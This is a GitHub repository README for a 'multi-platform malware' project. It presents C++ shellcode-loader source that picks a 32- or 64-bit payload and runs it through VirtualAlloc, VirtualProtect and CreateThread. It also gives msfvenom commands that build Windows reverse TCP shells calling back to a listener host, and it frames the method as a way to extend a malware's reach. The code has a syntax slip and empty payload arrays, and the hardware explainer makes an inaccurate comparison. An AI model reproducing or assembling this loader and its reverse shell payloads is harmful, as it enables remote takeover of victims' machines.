Skip to content

Malforge-Public-Organization/Multi-Platform-Malware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

Multi Platform Malware

Introduction

Demonstrating a custom project that executes shellcode and establishes a reverse shell on both 64-bit and 32-bit victim machines.

The malware first checks whether the Windows system is 32-bit or 64-bit, then executes the corresponding shellcode based on the system architecture.

Shellcode was generated using MSFVenom, a Metasploit module commonly used for creating payloads.

Difference between 32 and 64 bits

Information by:

What's the Difference Between 32-Bit and 64-Bit? - The Plug - HelloTech
If you've looked at buying a computer recently, you might have noticed that there are 32-bit computers and 64-bit. hellotech.com

When it comes to computers, the difference between 32-bit and a 64-bit is all about processing power. Computers with 32-bit processors are older, slower, and less secure, while a 64-bit processor is newer, faster, and more secure.

But what do the numbers 32 and 64 even mean?

Your computer’s CPU functions like the brain of your computer it controls all the communication of your computer. Some computers use two or more processors. However, there are only two main categories of processors now: 32-bit processors and 64-bit processors. The type of processor that your computer uses affects its overall performance and what kind of software it can utilize.

Most computers made in the 1990s to early 2000s have a 32-bit system that can access 2³² (or 4,294,967,296) bytes (units of digital information) of RAM (random access memory). Meanwhile, a 64-bit processor can handle 2⁶⁴ (or 18,446,744,073,709,551,616) bytes of RAM. In other words, a 64-bit processor can process more data than 4 billion 32-bit processors combined.

image

Code

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include <conio.h>

using namespace std;

int Is64BitWindows()
{
#if defined(_WIN64)
    return 0;
#elif defined(_WIN32)
    return 1
#else
    return 2;
#endif
}

unsigned char payload64[] = "";

unsigned char payload32[] = "";

int arq;

unsigned int my_payload_len64 = sizeof(payload64);
unsigned int my_payload_len32 = sizeof(payload32);

int main(void)
{
    arq = Is64BitWindows();
    void *my_payload_mem; // memory payload64fer for payload
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    if (arq == 0)
    {
        cout << "Sending Shell 64 bits";
        getch();
        my_payload_mem = VirtualAlloc(0, my_payload_len64, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        RtlMoveMemory(my_payload_mem, payload64, my_payload_len64);
        rv = VirtualProtect(my_payload_mem, my_payload_len64, PAGE_EXECUTE_READ, &oldprotect);
        if (rv != 0)
        {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)my_payload_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
        }
    }
    else if (arq == 1)
    {
        cout << "Sending Shell 32 bits";
        getch();
        my_payload_mem = VirtualAlloc(0, my_payload_len32, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        RtlMoveMemory(my_payload_mem, payload32, my_payload_len32);
        rv = VirtualProtect(my_payload_mem, my_payload_len32, PAGE_EXECUTE_READ, &oldprotect);
        if (rv != 0)
        {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)my_payload_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
        }
    }
    return 0;
}

Here two function are used :

  • Is64BitWindows : determines if the system is 64-bit (returns 0), 32-bit (returns 1), or other (returns 2).

  • Main : This function checks this result and runs the appropriate shellcode based on the system architecture."

Sample code provided below :

Executing Malicious Shell-Code with C++
Introductionmedium.comz

POC

When compiled and executed with the generated shellcode, the sample runs according to the system architecture.

Payload 64 bits:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.135 LPORT=1212  -f c

image

Payload 32 bits:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.135 LPORT=1212 -a x86 -f c

image

Executing the sample on a 64-bit machine to demonstrate 64-bit shellcode execution.

image

Detects a 64-bit machine and establishes a reverse shell connection.

image

Conclusions

That’s the end of the article. This approach is a practical way to expand the impact of your malware by targeting both 32-bit and 64-bit systems.

Thanks for reading :D

- Malforge Group

About

Cross-architecture malware designed to run seamlessly on both 32-bit and 64-bit Windows systems, featuring dynamic shellcode execution and reverse shell capabilities.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages